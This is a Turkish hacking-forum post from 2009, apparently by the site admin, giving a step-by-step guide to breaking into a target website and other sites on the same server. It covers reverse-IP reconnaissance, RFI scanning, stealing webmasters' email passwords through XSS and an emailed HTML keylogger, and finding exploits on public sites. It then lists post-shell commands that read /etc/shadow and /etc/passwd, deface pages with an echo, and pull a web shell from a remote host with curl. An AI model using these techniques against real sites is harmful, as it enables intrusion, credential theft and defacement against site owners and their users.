Derebahçe ~ GençliK
Hoşgeldiniz !
Üye olmadan forumdan yarar sağlayamazsınız.
Canlı konuşma için sitede başlık sayfasının altındaki chat box'a konuşabilirsiniz !
Moderatör Alımları Başlamıştır.
İyi Eğlenceler..



 
AnasayfaaFFéTméZ ~ TéaMKayıt OlGiriş yap

Paylaş | 
 

 Hedef Site Nasıl Hacklenir , Neler Yapmalı , Hangi Yollar İzlenmeli | Resimli

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
By.BiCi
Admin
Admin


Rep Gücü : 401
Rep Puanı : 10

MesajKonu: Hedef Site Nasıl Hacklenir , Neler Yapmalı , Hangi Yollar İzlenmeli | Resimli   Perş. Mart 05, 2009 10:24 pm

İlk Once Hedef Siteye İliskin Bilgileri Alabilicegimiz Siteleri Yazalım :

http://whois.sc/hedefsite.com - Bu Siteden Hedef Domainin Makine İp,Ns,Domainin Alınıs ve Bitis Tarihlerini Gorebilirsiniz.Ornek: Megaturks.net

http://whois.webhosting.info/hedefsite.com - Bu Sitemizden'de Hedef Sitemiz İp'si İle Aynı Serverda Bulunan Sitelerin Listesini Alabiliriz.Tabi bu Verdigim İki Adres Dısında İki Tane Daha İsinize Yarayacak Yer Var.

http://www.e-dns.org Son Olarak Bu Sitemizden Bahsediyim Sitede İlk Anasayfada Domain Whois yani Ns,ip,email vb.. Bilgileri Verir Reserve İp Kısmına Tıklarsanız.Sitenin Baglı Oldugunu makine yani serverdaki Siteleri Listeler Diger Verdigim Sitelere Nazaran Bu Sitemiz Daha Kapsamlı Olabilir ama Yinede Diger Siteleride Kosullara Gore Kullanınız


Neler Yapmalı ?


1) Bilgilerimizi Elde Ettikten Sonra Sıte Lıstemizle İslem Yapalım Oncelikle İsterseniz Tüm Listeyi Rfi Tarayıcı Programlara Atıp Acık Listenizle Taratma Yaptırabilirsiniz.Bu İslevi Goren Programlar Piyasada Mevcut.


2) İsterseniz Serverdaki Sitelerin Kendi Whoislerine Bakıp Domain Mailini Ele Gecirip Host Sifrelerine Ulasabilrisiniz.Bunun icin Yontemler;


Snifferla Xss Yontemi Yahoo - Gmail - Linuxmail - Hackermail -Superonline ve Mynet Hesaplarında Xss Acıgı Mevcut Bazıları Paylasılmadı ama Zamanla Megaturks'te Vericem.


Veya Sitede Paylasımını Yaptım HTML Keylogger Yapımı Sizi Sonuca Ulastırabilir Hedefin Mailine Atıp Tıklattırıp Tüm Sifrelerine Ulasabilirsiniz.


3)Site Listesindeki Siteleri tek tek Yada Scriptlerinde Acık Olabilicegine İnandıklarınızı milw0rm Securitydot.net gibi Sitelerden Guncel Acıklarına Bakıp Suncuya Girme Yollarına Gidebilirsiniz.Xss Sql RFİ Tarzı Acıklarla..


Hedefe Giris

Windows Yapılı Sunucular
Sunucuya Girdiginizi Varsayarsak Windows Yapılı Sunucularda Safe Mode: ON İse Kullanmanızı Tavsıye Edecegım Zehir Veya Benzeri Shellerdir.Dizin Gecmiyorsa Yapacagınız En Mantıklı Sey Program Files Kısmına İnmek Olur Burada Herhangi Bir Ftp Programı Kurulumu İnceleyiniz.Bilmeyen Arkadaslara Yazıyorum Windows Sunuculara Shelle Girdiginizde Yapıları Xp İle Aynıdır.Kurulu Ftp Programı varsa Emin Olun Ftp Logları Bi Yerde Vardır.Baska izleyeceginiz Yol İse Sudur

RESİM 1 :



Resim 2 :

http://pic1.resimupload.com/r3/thumb_449027247.jpg

Windows Sunucularda Guvenligi Asmanın Yolları Kısıtlıdır Ama Zamanla Onlarıda Paylasırız.Lınux Kadar Bypass ve Root Olunması Kolay Degıldır.

Linux Yapılı Sunucular

Linux Sistemi Php İcin Cok İyi Olmasına Karsın ve Saldırılara karsı Daha Cok Korumaları Olmasına Ragmen Shelle Girildiginde En Cok Darbe Yiyen Sunucular Linuxlerdir.Kullanabiliceginiz Basit Komutlar;



cat /etc/shadow - Sunucudaki Site Sifreleri Saklıdır %90 Perm Vardır

cat /etc/passwd - Sunucudaki Kullanıcıları Listeler

/var/named - Sunucudaki Siteleri Listeler

/var/cpanel - Cpanel Loglarını Verir

/var/mail - Sunucudaki Kullanıcıları Listeler

/tmp - Linuxte yazma İzni En Cok Bulunan Klasor

/etc/vdomainaliases - Hem Kullanıcıları Hemde Site Adreslerini Listeler

echo Hacked By GHOST turkhackgrup.com >/home/sıte/public_html - Echo Komutu Sunucuda Hızlı Bir sekilde Bazı

perm li Dosyalara Bile Uyarınızı Basmaya Yarar

curl -o shell.php http://www.site.com/shell.txt - Bazı Sunucularda Klasorlere Normal Upload Yokken Bu Komutumuzla Shell İmizi cekebiliriz.


Safe Mode: ON ve Disable Functionlarla Fonksiyonları Durdurulmus ve Engellemis Linuxlerde Safe Mode : ON Bypass ın nasıl yapıldığını hem bazı konulardada anlattık

özellikle shell kullanmayı bilmiyosanız bu konudan önce sitede açmış olduğum Professıonal RFI adlı konuda bir RFI uzmanı olabilirsiniz



İyi Hackler ...
Sayfa başına dön Aşağa gitmek
 
Hedef Site Nasıl Hacklenir , Neler Yapmalı , Hangi Yollar İzlenmeli | Resimli
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Herşeyi İle GTA Vice City
» Televizyon nedir?nasıl çalışır?
» Mesajınız Altında Gözüken İmza Resmi Nasıl Koyulur
» Senaryo nasıl yazılır?nasıl başlanır?
» SEAT IBIZA’YA 1.2 TDI TAKVİYESİ

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Derebahçe ~ GençliK :: Hacking area :: Web-Domain Hacking-
Buraya geçin: